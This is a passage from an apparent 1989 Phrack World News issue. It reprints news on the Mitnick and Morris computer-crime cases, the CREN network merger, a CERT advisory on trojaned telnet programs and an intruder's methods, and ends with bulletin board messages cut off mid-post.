  2886. some problems that would
  2887. benefit from counseling.
  2888.  
  2889. Pfaelzer will actually pass sentence at a hearing set for
  2890. Tuesday, July 18.
  2891.  
  2892. The idea that a computer "junkie" who cannot control his urge to
  2893. break into computers could be helped with a program similar to
  2894. Alcoholics Anonymous is a new one, Harriet Rossetto, director of
  2895. the treatment program, told the judge.
  2896.  
  2897. "His behavior is an impulse disorder," Rossetto said.  "The
  2898. disease is the addiction, whether it be drugs, alcohol, gambling,
  2899. hacking, money or power."
  2900.  
  2901. Rossetto, who was contacted by Mitnick's family, said Mitnick
  2902. would be the first person addicted to computer crime to be
  2903. treated in the Bet T'shuvah program , a 20-bed residential
  2904. treatment program for Jewish criminal offenders.
  2905.  
  2906. "It's not willful conduct, what Kevin does," she said.  "He's
  2907. tried to control his behavior but hacking gives him a sense of
  2908. power, makes him feel like somebody when he's depressed or he's
  2909. lost a job."
  2910.  
  2911. Mitnick, age 25, has been in federal prison for seven months
  2912. since his arrest
  2913. last December on computer fraud charges.
  2914.  
  2915. He pleaded guilty in May to possessing 16 unauthorized MCI
  2916. long-distance codes and to stealing a computer security program
  2917. from the Digital Equipment Corporation in Massachusetts.
  2918.  
  2919. Mitnick has been described in court as a computer whiz who could
  2920. break into secured systems and change telephone or school records
  2921. at will.  He told the judge on Monday, July 17 that he wants to
  2922. stop hacking.
  2923.  
  2924. "I sincerely want to change my life around and be productive
  2925. rather than destructive," Mitnick said.
  2926.  
  2927. "With counseling to break the addictive pattern I feel I have
  2928. towards computer hacking, I can take an active role and I don't
  2929. have to have the compulsive behavior again."
  2930.  
  2931. Assistant U.S. Attorney James R. Asperger said that the
  2932. government does not oppose Mitnick's release from prison to be
  2933. treated at Bet T'shuvah.
  2934.  
  2935. "The judge has taken this case very seriously.  It shows computer
  2936. hacking is not like a Nintendo game," Asperger said.
  2937.  
  2938. Mitnick has cooperated with FBI investigators since his pleaded
  2939. guilty and helped bring charges against his former best friend,
  2940. Leonard DiCicco, 23, of Calabasas, Asperger said.
  2941.  
  2942. DiCicco, who initially tipped the FBI to Mitnick's crimes, has
  2943. agreed to plead guilty to a charge of aiding and abetting the
  2944. transportation of a stolen computer program.
  2945.  
  2946. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2947.  
  2948. Authorities Backed Away From Original Allegations
  2949. July 23, 1989
  2950. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2951. by Karen E. Klein (New York Times)
  2952.  
  2953. LOS ANGELES -- Shortly after computer hacker Kevin Mitnick was
  2954. arrested last December (1988), he was characterized as an extreme
  2955. threat who could wreak electronic chaos if he got near so much as
  2956. a telephone without supervision.
  2957.  
  2958. Police and FBI agents started trying to corroborate the flurry of
  2959. rumors that arose about the malicious actions of the computer
  2960. whiz from suburban Panorama City, whose case attracted national
  2961. attention.
  2962.  
  2963. Three judges denied Mitnick, age 25, bail on the ground that he
  2964. was a danger to society and ordered him held in a high-security
  2965. jail cell.
  2966.  
  2967. But after separating the Mitnick myth from the reality,
  2968. authorities backed away from many of their original allegations.
  2969.  
  2970. "A lot of the stories we originally heard just didn't pan out, so
  2971. we had to give him the benefit of the doubt," said James R.
  2972. Asperger, the assistant U.S. attorney who handled Mitnick's case.
  2973.  
  2974. Mitnick, pudgy and nervous, appeared in court last week to
  2975. apologize for his crimes and to ask for treatment to help break
  2976. his compulsive "addiction" to computers.
  2977.  
  2978. U.S. District Judge Mariana R. Pfaelzer sentenced him to serve
  2979. one year in
  2980. prison -- including the nearly eight months he already has served
  2981. -- and then to undergo six months of counseling and treatment
  2982. similar to that given to alcoholics or drug addicts.
  2983.  
  2984. "I think he has problems that would benefit greatly from this
  2985. kind of therapy," Pfaelzer said.  "I want him to spend as much
  2986. time as possible in counseling."
  2987.  
  2988. The case that began with a bang ended with Asperger pointing out
  2989. that the one-year prison term is the stiffest sentence ever
  2990. handed out in a computer fraud case.
  2991.  
  2992. Mitnick originally was accused of using unauthorized MCI
  2993. long-distance codes to tap into Leeds University computers in
  2994. England and of stealing a $4 million computer security system
  2995. from the Digital Equipment Corporation in Massachusetts.
  2996.  
  2997. He ultimately agreed to plead guilty to possessing 16
  2998. unauthorized MCI long-distance codes and to stealing the computer
  2999. security program.  The other charges were dismissed.
  3000.  
  3001. Alan Rubin, Mitnick's lawyer, said he felt vindicated by the
  3002. outcome of the case.
  3003.  
  3004. Rubin contended from the start that computerphobia and adolescent
  3005. exaggeration led authorities to mistakenly brand Mitnick a
  3006. malicious criminal.
  3007.  
  3008. "Once the snowball starts rolling, you can't stop it," said
  3009. Rubin, who waged an unsuccessful campaign up to the federal
  3010. appeals court to get bail for his client.
  3011.  
  3012. Far from being serious, Rubin said, Mitnick's actions were mostly
  3013. immature, adolescent pranks.
  3014.  
  3015. He pointed to evidence that Mitnick was able to electronically
  3016. cut off telephone service to people he was angry with and once
  3017. sent an enemy a $30,000 hospital telephone bill.
  3018.  
  3019. "It was the computer equivalent of sending your friend 14
  3020. pizzas," he said.
  3021.  
  3022. Many of the legends surrounding Mitnick came from the subculture
  3023. of computer hackers -- and specifically from a man who was once
  3024. Mitnick's best friend, Leonard Mitchell DiCicco, age 23, of
  3025. Calabasas, California.
  3026.  
  3027. DiCicco, who had a falling out with Mitnick over a $100 bet, told
  3028. computer security specialists at the Digital Equipment
  3029. Corporation that Mitnick had been trespassing on their system.
  3030.  
  3031. They in turn contacted the FBI agents, who arrested Mitnick.
  3032.  
  3033. What DiCicco told investigators may or may not have been entirely
  3034. truthful, Rubin said.
  3035.  
  3036. "I have no idea what his motives were," Rubin said.
  3037.  
  3038. But DiCicco, who alerted authorities to Mitnick's crime, had the
  3039. tables turned on him after the government refused to grant him
  3040. absolute immunity for his testimony against Mitnick.
  3041.  
  3042. When the prosecution said they might charge him with a crime,
  3043. DiCicco clammed up and refused to cooperate any further.  But
  3044. from his prison cell, Mitnick agreed to cooperate and provided
  3045. enough incriminating evidence for the government to charge
  3046. DiCicco.
  3047.  
  3048. DiCicco is expected to plead guilty to a charge of aiding and
  3049. abetting the interstate transportation of stolen property -- the
  3050. computer security program -- on Monday.
  3051.  
  3052. Asperger said he was not sure whether DiCicco would get a
  3053. sentence similar to Mitnick's.
  3054.  
  3055. "Although they were friends and partners in computer hacking,
  3056. (DiCicco) appeared to play a subordinate role (in the crime),"
  3057. Asperger said.
  3058.  
  3059. Other rumors about Mitnick's conduct came from fellow hackers,
  3060. who may have blown the stories out of proportion.
  3061.  
  3062. "It's a very strange sub-culture, with a lot of jealousies,"
  3063. Rubin said.  "Part of it is bragging about how macho you are and
  3064. what systems you've broken into.  It's very immature in a lot of
  3065. ways."
  3066.  
  3067. But prosecutors, citing Mitnick's various scrapes with computer
  3068. misconduct since he was 13, aren't willing to let him off the
  3069. hook entirely.
  3070.  
  3071. "I think there's some substance to these things (the rumors that
  3072. arose in Mitnick's case), an awful lot of them," said Los Angeles
  3073. FBI chief Lawrence Lawler, who is a computer buff himself and
  3074. followed Mitnick's case closely.
  3075.  
  3076. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3077.  
  3078. If you are looking for other articles about Kevin David Mitnick aka Condor
  3079. please refer to;
  3080.  
  3081. "Pacific Bell Means Business"                     (10/06/88) PWN XXI. . .Part 1
  3082. "Dangerous Hacker Is Captured"                    (No Date ) PWN XXII . .Part 1
  3083. "Ex-Computer Whiz Kid Held On New Fraud Counts"   (12/16/88) PWN XXII . .Part 1
  3084. "Dangerous Keyboard Artist"                       (12/20/88) PWN XXII . .Part 1
  3085. "Armed With A Keyboard And Considered Dangerous"  (12/28/88) PWN XXIII. .Part 1
  3086. "Dark Side Hacker Seen As Electronic Terrorist"   (01/08/89) PWN XXIII. .Part 1
  3087. "Mitnick Plea Bargains"                           (03/16/89) PWN XXV. . .Part 1
  3088. "Mitnick Plea Bargain Rejected As Too Lenient"    (04/25/89) PWN XXVII. .Part 1
  3089. "Computer Hacker Working On Another Plea Bargain" (05/06/89) PWN XXVII. .Part 1
  3090. "Mitnick Update"                                  (05/10/89) PWN XXVII. .Part 1
  3091. "Kenneth Siani Speaks Out About Kevin Mitnick"    (05/23/89) PWN XXVII. .Part 1
  3092. _______________________________________________________________________________
  3093.  
  3094. BITNET/CSNET Announce Merger and Formation of CREN              August 18, 1989
  3095. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Washington, DC
  3096. -- Two of the nation's leading academic and research computer
  3097. networks announced today that final steps are being taken to
  3098. merge their organizations.
  3099.  
  3100. Ira Fuchs, President of BITNET, and Bernard Galler, Chairman of
  3101. CSNET, jointly reported that the two networks, which together
  3102. include 600 colleges, universities, government agencies, and
  3103. private sector research organizations, will unite to form the
  3104. Corporation for Research and Educational Networking, CREN.
  3105.  
  3106. Galler, a Professor of Electrical Engineering and Computer
  3107. Science at the University of Michigan, commented:  "The aims of
  3108. CSNET and BITNET -- to support and promote the use of computer
  3109. networks on campuses and within research organizations -- have
  3110. converged over the last several years.  We believe that by
  3111. bringing these two networks into a single organization, we will
  3112. be able to provide better service to our network users and more
  3113. effectively participate in the fast-changing national network
  3114. environment."
  3115.  
  3116. Fuchs, Vice President for Computing and Information Technology at
  3117. Princeton University, sees the move as a strengthening factor:
  3118. "The need for campus networks and the introduction of new
  3119. technology make it necessary to build a common base of network
  3120. services using the most progressive technology available.  By
  3121. eliminating overlap between our two organizations, we will
  3122. become more efficient, and more importantly, we can take a
  3123. stronger role in the the formation of the national education and
  3124. research network.  We can achieve this goal faster and at lower
  3125. cost by leveraging the efforts of the two major academic
  3126. networking organizations."
  3127.  
  3128. The merger of CSNET and BITNET has been studied for more than a
  3129. year by a planning group consisting of representatives from both
  3130. networks.  CSNET currently lists 145 institutional and corporate
  3131. members, and BITNET 480 members.  Together, the two networks
  3132. cover all 50 states and 32 foreign countries, including Japan,
  3133. Brazil, Mexico, and Argentina.  Both maintain gateways to EARN
  3134. (European Academic Research Network), NetNorth (Canada), and the
  3135. National Internet.
  3136.  
  3137. The planning group's recommendations to merge were approved by
  3138. the BITNET, Inc.  Trustees and the Directors of the University
  3139. Corporation for Atmospheric Research, operators of CSNET for the
  3140. last five years.  An information packet on the merger is being
  3141. mailed to all members of both networks this week, with a ballot
  3142. for BITNET members, who must approve the final legal steps under
  3143. the provisions of BITNET By-Laws.  In an advisory vote last
  3144. winter, BITNET members approved the merger in principle by more
  3145. than 90% of those voting.
  3146.  
  3147. A gradual transition period is planned to bring together CSNET
  3148. and BITNET services.  CREN plans to continue use of EDUCOM and
  3149. Bolt, Beranek and Newman (BBN) to provide technical and general
  3150. management services to its members.
  3151.  
  3152. EDUCOM President Kenneth M. King commented, "We are entering a
  3153. particularly challenging period in the creation of an advanced
  3154. national network infrastructure for research and education.  CREN
  3155. will play a major role in the future of these computer networks,
  3156. which are becoming more and more important to the conduct of
  3157. research and the quality of education.  EDUCOM is pleased to have
  3158. an opportunity to support the services and activities of CREN. "
  3159.  
  3160. Frank Heart, Senior Vice President, BBN Systems and Technologies
  3161. Corporation, said, "In keeping with its long involvement in the
  3162. development of networking technologies, BBN is pleased to play a
  3163. major supporting role in the evolution of BITNET and CSNET."
  3164.  
  3165. The proposed CREN Board includes Fuchs and Galler;
  3166.  
  3167. Douglas Bigelow. . . . . Wesleyan University
  3168. William Curtis . . . . . University Corporation for Atmospheric Research
  3169. David Farber . . . . . . University of Pennsylvania
  3170. Suzanne Johnson. . . . . INTEL Corporation
  3171. Mark Laubach . . . . . . Hewlett-Packard Corporation
  3172. Philip Long. . . . . . . Yale University
  3173. Dennis Ritchie . . . . . AT&T Bell Laboratories
  3174. Martin Solomon . . . . . University of South Carolina
  3175. Douglas Van Houweling. . University of Michigan
  3176. William Yundt. . . . . . Stanford University
  3177.  
  3178. For more information, contact
  3179.  
  3180.               Corporation for Research and Educational Networking
  3181.                                    Suite 600
  3182.                               1112 16th Street NW
  3183.                              Washington, DC  20036
  3184.  
  3185.                                 (202) 872-4215
  3186.  
  3187.               [Obviously they decided not to call it ONEnet --KL]
  3188. _______________________________________________________________________________
  3189.  
  3190. CERT Internet Security Advisory                                 August 16, 1989
  3191. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3192. >From Kenneth R. van Wyk
  3193.  
  3194. Many computers connected to the Internet have recently
  3195. experienced unauthorized system activity.  Investigation shows
  3196. that the activity has occurred for several months and is
  3197. spreading.  Several UNIX computers have had their "telnet"
  3198. programs illicitly replaced with versions of "telnet" which log
  3199. outgoing login sessions (including usernames and passwords to
  3200. remote systems).  It appears that access has been gained to many
  3201. of the machines which have appeared in some of these session
  3202. logs.  (As a first step, frequent telnet users should change
  3203. their passwords immediately.)  While there is no cause for panic,
  3204. there are a number of things that system administrators can do to
  3205. detect whether the security on their machines has been
  3206. compromised using this approach and to tighten security on their
  3207. systems where necessary.  At a minimum, all UNIX site
  3208. administrators should do the following:
  3209.  
  3210. o Test telnet for unauthorized changes by using the UNIX
  3211.   "strings" command to search for path/filenames of possible log
  3212.   files.  Affected sites have noticed that their telnet programs
  3213.   were logging information in user accounts under directory names
  3214.   such as "..." and ".mail".
  3215.  
  3216. In general, we suggest that site administrators be attentive to
  3217. configuration management issues.  These include the following:
  3218.  
  3219.  
  3220. o Test authenticity of critical programs - Any program with
  3221.   access to the network (e.g., the TCP/IP suite) or with access
  3222.   to usernames and passwords should be periodically tested for
  3223.   unauthorized changes.  Such a test can be done by comparing
  3224.   checksums of on-line copies of these programs to checksums of
  3225.   original copies.  (Checksums can be calculated with the UNIX
  3226.   "sum" command.)  Alternatively, these programs can be
  3227.   periodically reloaded from original tapes.
  3228.  
  3229. o Privileged programs - Programs that grant privileges to users
  3230.   (e.g., setuid root programs/shells in UNIX) can be exploited to
  3231.   gain unrestricted access to systems.  System administrators
  3232.   should watch for such programs being placed in places such as
  3233.   /tmp and /usr/tmp (on UNIX systems).  A common malicious
  3234.   practice is to place a setuid shell (sh or csh) in the /tmp
  3235.   directory, thus creating a "back door" whereby any user can
  3236.   gain privileged system access.
  3237.  
  3238. o Monitor system logs - System access logs should be periodically
  3239.   scanned (e.g., via UNIX "last" command) for suspicious or
  3240.   unlikely system activity.
  3241.  
  3242. o Terminal servers - Terminal servers with unrestricted network
  3243.   access (that is, terminal servers which allow users to connect
  3244.   to and from any system on the Internet) are frequently used to
  3245.   camouflage network connections, making it difficult to track
  3246.   unauthorized activity.  Most popular terminal servers can be
  3247.   configured to restrict network access to and from local hosts.
  3248.  
  3249. o Passwords - Guest accounts and accounts with trivial passwords
  3250.   (e.g., username=password, password=none) are common targets.
  3251.   System administrators should make sure that all accounts are
  3252.   password protected and encourage users to use acceptable
  3253.   passwords as well as to change their passwords periodically, as
  3254.   a general practice.  For more information on passwords, see
  3255.   Federal Information Processing Standard Publication (FIPS PUB)
  3256.   112, available from the National Technical Information Service,
  3257.   U.S. Department of Commerce, Springfield, VA 22161.
  3258.  
  3259. o Anonymous file transfer - Unrestricted file transfer access to
  3260.   a system can be exploited to obtain sensitive files such as the
  3261.   UNIX /etc/passwd file.  If used, TFTP (Trivial File Transfer
  3262.   Protocol - which requires no username/password authentication)
  3263.   should always be configured to run as a non-privileged user and
  3264.   "chroot" to a file structure where the remote user cannot
  3265.   transfer the system /etc/passwd file.  Anonymous FTP, too,
  3266.   should not allow the remote user to access this file, or any
  3267.   other critical system file.  Configuring these facilities to
  3268.   "chroot" limits file access to a localized directory structure.
  3269.  
  3270. o Apply fixes - Many of the old "holes" in UNIX have been closed.
  3271.   Check with your vendor and install all of the latest fixes.
  3272.  
  3273. If system administrators do discover any unauthorized system
  3274. activity, they are urged to contact the Computer Emergency
  3275. Response Team (CERT).
  3276.  
  3277. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3278. - - - - - - -
  3279.  
  3280. Internet Cracker On The Loose:  Who Is He?
  3281. October 2, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ There
  3282. is a cracker on the loose in the Internet.  This is the
  3283. information made public so far.  Traces of the cracker were found
  3284. at the Institute for Advanced Studies in Princeton.  He also left
  3285. traces at one of the Super computer centers.  Both CERT and the
  3286. FBI have been called.
  3287.  
  3288. The technique that is being used is as follows:
  3289.  
  3290. 1) He has a modified telnet that tries a list passwords on
  3291.    accounts.  Username forwards and backwards, username + pw,
  3292.    etc.
  3293.  
  3294. 2) He seems to have a program call "ret", that is breaking into
  3295. root.
  3296.  
  3297. 3) He seems to be getting a list of victim machines via people's
  3298. .rhosts files.
  3299.  
  3300. 4) He copies password files to the machines that he is currently
  3301. working from.
  3302.  
  3303. 5) He is good about cleaning up after himself.  He zeros out log
  3304.    files and other traces of himself.
  3305.  
  3306. 6) The breakins are occurring between 10 PM Sunday nights and 8
  3307.    AM Monday mornings.
  3308.  
  3309. 7) He seems to bring along a text file of security holes to the
  3310.    machines he breaks into.
  3311.  
  3312. 8) Backtracing the network connections seem to point to the
  3313.    Boston area as a base of operations.
  3314.  
  3315. The system administrator at IAS found a directory with the name
  3316. "..  " (dot dot space space).  The files mentioned above were
  3317. found in this directory.
  3318. _______________________________________________________________________________
  3319.  
  3320. Worried Firms Pay Hush Money To "Hackers"                         June 12, 1989
  3321. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3322. By Richard Caseby (London Times)
  3323.  
  3324.             "Are London Firms Offering Amnesty To Hacker Thieves?"
  3325.  
  3326. Firms in the City of London are buying the silence of hackers who
  3327. break into their computers and steal millions of pounds.
  3328.  
  3329. At least six London firms have signed agreements with criminals,
  3330. offering them amnesty if they return part of the money.  The
  3331. firms fear that if they prosecute they will lose business when
  3332. customers learn that their computer security is flawed.
  3333.  
  3334. In several of the case the losses exceeded 1 million pounds, but
  3335. only a tenth of the total was returned.
  3336.  
  3337. The Computer Industry Research Unit (CIRU) which uncovered the deals and which
  3338. is advising the Department of Trade and Industry in data security, believes the
  3339. practice of offering amnesties is widespread.
  3340.  
  3341. "Companies who feel vulnerable are running scared by agreeing to these immoral
  3342. deals.  Their selfishness is storing up serious problems for everyone else,"
  3343. said Peter Nancarrow, a senior consultant.
  3344.  
  3345. Police have warned that deals struck with criminals could
  3346. possibly lead to an employer being prosecuted for perverting the
  3347. course of justice.
  3348.  
  3349. Detective Inspector John Austin, of Scotland Yard's computer
  3350. fraud squad, said, "Employers could find themselves in very deep
  3351. water by such strenuous efforts to protect the credibility of
  3352. their image."
  3353.  
  3354. Legal experts say the firms are making use of section five of the
  3355. Criminal Law Act 1967 which allows them to keep silent on crimes
  3356. and privately agree on compensation.  However, an employer
  3357. becomes a witness to the offense by taking evidence from a
  3358. criminal when the deal is drawn up.
  3359.  
  3360. Hackers steal by electronically transferring funds or by
  3361. programming a computer to round off all transactions by a tiny
  3362. amount and diverting the money to a separate account.
  3363.  
  3364. In one case, an assistant programmer at a merchant bank diverted
  3365. 8 million pounds to a Swiss bank account and then gave back 7
  3366. million in return for a non-disclosure agreement protecting him
  3367. against prosecution.
  3368.  
  3369. Such thefts have spread alarm throughout London, with consultants
  3370. offering to penetrate the computer networks of banks and finance
  3371. houses to pinpoint loopholes before a hacker does.
  3372.  
  3373. The biggest contracts cost up to 50,000 pounds and can involve a
  3374. four month investigation in which every weakness is explored.
  3375.  
  3376. Detectives have found that computer security at many London
  3377. institutions is riddled with loopholes.  A city of London police
  3378. operation, codenamed Comcheck, revealed wide spread weaknesses.
  3379. Firms were asked to track the number of unauthorized logons over
  3380. Easter bank holiday.
  3381.  
  3382. Some companies unable to tell whether hackers had penetrated
  3383. their network, while others lacked any security defenses.
  3384.  
  3385. In addition to theft, companies are vulnerable to blackmail.
  3386. Hackers can threaten to sabotage computers by inserting "viruses"
  3387. and "logic bombs" --rogue programs which can paralyze a system.
  3388.  
  3389. This type of threat has prompted the offer of a new insurance
  3390. policy underwritten by Lloyd's which specifically covers viruses
  3391. and other computer catastrophes.
  3392. ______________________________________________________________________
  3393.  
  3394.                                 ==Phrack Inc.==
  3395.  
  3396.                     Volume Three, Issue 28, File #10 of 12
  3397.  
  3398.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  3399.             PWN                                                 PWN
  3400.             PWN        P h r a c k   W o r l d   N e w s        PWN
  3401.             PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
  3402.             PWN               Issue XXVIII/Part 2               PWN
  3403.             PWN                                                 PWN
  3404.             PWN                 October 7, 1989                 PWN
  3405.             PWN                                                 PWN
  3406.             PWN          Created, Written, and Edited           PWN
  3407.             PWN               by Knight Lightning               PWN
  3408.             PWN                                                 PWN
  3409.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  3410.  
  3411.  
  3412. Grand Jury Indicts Student For Crippling Nationwide Computer Network    7/26/89
  3413. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3414. by John Markoff (New York Times)
  3415.  
  3416. After more than eight months of delay, the Justice Department said Wednesday
  3417. that a federal grand jury in Syracuse, N.Y., had indicted the 24-year-old
  3418. Cornell University graduate student who has been blamed for crippling a
  3419. nationwide computer network with a rogue software program.
  3420.  
  3421. The student, Robert Tappan Morris, was charged with a single felony count under
  3422. a 1986 computer crimes law, the Computer Fraud and Abuse Act.  Justice
  3423. Department officials said the indictment was the first under a provision of the
  3424. law that makes it illegal to gain unauthorized access to federal computers.
  3425.  
  3426. A spokesman for the Justice Department said Wednesday that the indictment had
  3427. been delayed simply because of the time taken to develop evidence.
  3428.  
  3429. But legal experts familiar with the case said the department had been stalled
  3430. in efforts to prosecute Morris because of an internal debate over whether it
  3431. might be impossible to prove the charges.  Under the 1986 law, prosecutors must
  3432. show that Morris intended to cripple the computer network.
  3433.  
  3434. As a result of this concern, the U.S. attorney in Syracuse, Frederick J.
  3435. Scullin Jr., had considered a plea bargain in which Morris would have pleaded
  3436. guilty to a misdemeanor charge.  This approach was apparently resisted,
  3437. however, by Scullin's superiors in Washington, who wanted to send a clear
  3438. signal about the seriousness of computer crime.
  3439.  
  3440. Three bills now pending before Congress would make it easier than with the 1986
  3441. law to prosecute malicious invasion of computer systems.
  3442.  
  3443. The indictment charges that Morris was the author of a computer program that
  3444. swept through a national network composed of more than 60,000 computers
  3445. November 2, 1988 jamming as many as 6,000 machines at universities, research
  3446. centers and military installations.
  3447.  
  3448. The software, which computer hackers call a "virus," was supposed to hide
  3449. silently in the computer network, two of Morris' college friends said, but
  3450. because of a programming error it multiplied wildly out of control.  The
  3451. friends said Morris' idea had been to simply to prove that he could bypass the
  3452. security protection of the network.
  3453.  
  3454. According to Wednesday's indictment, Morris gained unauthorized access to
  3455. computers at the National Aeronautics and Space Administration's Ames Research
  3456. Center in Moffett Field, California; the U.S. Air Force Logistics Command at
  3457. Wright Patterson Air Force Base in Dayton, Ohio; the University of California
  3458. at Berkeley, and Purdue University.
  3459.  
  3460. The indictment charges that the program shut down numerous computers and
  3461. prevented their use.  It charges Morris with causing "substantial damage" at
  3462. many computer centers resulting from the loss of service and the expense
  3463. incurred diagnosing the program.
  3464.  
  3465. The felony count carries a maximum penalty of five years in prison and a fine
  3466. of $250,000, in addition to which the convicted person can be ordered to pay
  3467. restitution to those affected by his program.
  3468.  
  3469. Morris' lawyer, Thomas A. Guidoboni, said his client intended to plead not
  3470. guilty.  Morris, who now lives in the Boston area, was scheduled to be
  3471. arraigned on Wednesday, August 2, before Gustave J. DiBianco, a U.S. magistrate
  3472. in Syracuse.
  3473.  
  3474. Morris' father, Robert, the chief scientist for the National Security Agency,
  3475. said the family planned to stand behind their son.  "We're distressed to hear
  3476. of the indictment," he said.
  3477.  
  3478. After realizing that his program had run amok, Morris went to his family home
  3479. in Arnold, Maryland, and later met with Justice Department officials.
  3480.  
  3481. The 1986 law was the first broad federal attempt to address the problem of
  3482. computer crime.  Morris is charged with gaining unauthorized access to
  3483. computers, preventing authorized access by others and causing more than $1,000
  3484. in damage.
  3485.  
  3486. The incident raised fundamental questions about the security of the nation's
  3487. computers and renewed debate over the who should be responsible for protecting
  3488. the nation's non-military computer systems.
  3489.  
  3490. Last year Congress settled a debate between the National Security Agency and
  3491. the National Institute of Standards and Technology by giving authority over
  3492. non-military systems to the civilian agency.
  3493.  
  3494. Last week, however, a General Accounting Office report based on an
  3495. investigation of the incident recommended that the Office of Science and
  3496. Technology Policy coordinate the establishment of an interagency group to
  3497. address computer network security.
  3498.  
  3499. The incident has also bitterly divided computer scientists and computer
  3500. security experts around the country.  Some have said they believe that "an
  3501. example" should be made of Morris to discourage future tampering with computer
  3502. networks.
  3503.  
  3504. Others, however, have argued that Morris performed a valuable service by
  3505. alerting the nation to the laxity of computer security controls.
  3506.  
  3507. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3508.  
  3509. Other articles about Robert Tappan Morris, Jr. and the Internet Worm are;
  3510.  
  3511. "Computer Network Disrupted By 'Virus'"          (11/03/88) PWN XXII  -Part 2
  3512. "Virus Attack"                                   (11/06/88) PWN XXII  -Part 2
  3513. "The Computer Jam:  How It Came About"           (11/08/88) PWN XXII  -Part 2
  3514. "US Is Moving To Restrict {...} Virus"           (11/11/88) PWN XXII  -Part 2 *
  3515. "FBI Studies Possible Charges In Virus"          (11/12/88) PWN XXII  -Part 2
  3516. "Big Guns Take Aim At Virus"                     (11/21/88) PWN XXII  -Part 3
  3517. "Congressman Plan Hearings On Virus"             (11/27/88) PWN XXII  -Part 3
  3518. "Pentagon Severs Military {...} Virus"           (11/30/88) PWN XXII  -Part 3 *
  3519. "Networks Of Computers At Risk From Invaders"    (12/03/88) PWN XXII  -Part 4 *
  3520. "Computer Virus Eradication Act of 1988"         (12/05/88) PWN XXII  -Part 4 *
  3521. "Breaking Into Computers {...}, Pure and Simple" (12/04/88) PWN XXIV  -Part 1 *
  3522. "Cornell Panel Concludes Morris {...} Virus"     (04/06/89) PWN XXVI  -Part 1
  3523. "Robert T. Morris Suspended From Cornell"        (05/25/89) PWN XXVII -Part 2
  3524. "Justice Department Wary In Computer Case"       (05/28/89) PWN XXVII -Part 2
  3525.  
  3526. * - Indicates that the article was not directly related to Robert Morris, but
  3527.     did discuss him as well as the Internet Worm incident.
  3528. _______________________________________________________________________________
  3529.  
  3530. The Free World Incident                                            July 5, 1989
  3531. ~~~~~~~~~~~~~~~~~~~~~~~
  3532. Special Thanks to Brew Associates of Phortune 500
  3533.  
  3534.                [Some articles edited for this presentation --KL]
  3535.  
  3536. Numb: 84 of 98                7/2/89 at 8:56 pm
  3537. Subj: ...
  3538. Sect: General Messages
  3539. From: Major Havoc
  3540.  
  3541. Here is the story...
  3542.  
  3543. Evidently, someone got into Chesapeake & Potomac's (C&P) computer systems, and
  3544. added call forwarding to the telephone line that the Free World is being run
  3545. on.  It was not done through social engineering, because there was not an order
  3546. pending on my line.  Therefore, I had "free" call waiting on my line.
  3547.  
  3548. What the individual who did this does not realize is that service cannot be
  3549. changed on my line unless it is typical service, because because my father is a
  3550. retired VP from C&P.
  3551.  
  3552. The phone lines at this location are paid for by C&P, so the only way that the
  3553. service on these lines could have been changed is directly via the C&P computer
  3554. systems.  I had a long talk with C&P security, and they know who the individual
  3555. was that made the changes in the system.  My parents (since I do not even
  3556. really live here anymore) are supposed to be signing papers that will have this
  3557. individual prosecuted sometime next week, because he was foolish enough to
  3558. leave something for them to track down.
  3559.  
  3560. My guess is that it was someone who was denied access to the system that has
  3561. some type of grudge to hold or something.  I will have the pleasure of seeing
  3562. this individual serve time, if they are not a minor.
  3563.  
  3564. C&P Security questioned me in person and asked me if I had any information on
  3565. different incidents concerning central office burglaries or theft of C&P
  3566. property.  Some of you may be getting a BIG surprise REAL soon.
  3567.  
  3568. The bottom line is that I am not going to put up with this hassle much longer.
  3569. The mere fact that I am under possible investigation for something that I am
  3570. not involved with is really starting to get me upset.  I am 20 years old, and I
  3571. have a nice 32K salary job, and I am not going to tolerate these situations any
  3572. longer.  I have been doing this for so long, that it is about time that I got
  3573. some kind of recognition, and not more grief from a bunch of worthless
  3574. Christmas modemers.
  3575.  
  3576. Shape up or pay the consequences.
  3577.  
  3578.                                                                 -Major Havoc
  3579.  
  3580. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3581.  
  3582. Numb: 86 of 98                7/2/89 at 11:54 pm
  3583. Subj: Hmm..
  3584. Sect: General Messages
  3585. From: Weatherman
  3586.  
  3587. I would do the same thing.  If some guy thinks he is being really slick and
  3588. does something like that just to cause trouble, they deserve a rude awakening
  3589. to real life.  Keep us posted on the situation.  I can see your point as to
  3590. your job and age and everything since I am in the same boat.  I am not going to
  3591. sacrifice my future life for any reason.  Unfortunately, I don't make 32k yet.
  3592.  
  3593.                                                         \%\%eatherman
  3594.  
  3595. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3596.  
  3597. Numb: 87 of 98                7/3/89 at 12:07 pm
  3598. Subj: Umm...
  3599. Sect: General Messages
  3600. From: Lost Carrier
  3601.  
  3602. Major Havoc -- The only part of your message I am concerned about is "I had a
  3603. long talk with C&P security and a lot of you will be in for a big surpirse," or
  3604. something to that effect.  I hate surprises.  Which of us?     heh.
  3605.  
  3606.                                                                 LC, 2af
  3607.  
  3608. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3609.  
  3610. Numb: 89 of 98                7/3/89 at 4:03 pm
  3611. Subj: ....
  3612. Sect: General Messages
  3613. From: Raving Lunatic
  3614.  
  3615. I am shocked.  Major Havoc turning people in?  About time, I guess it takes
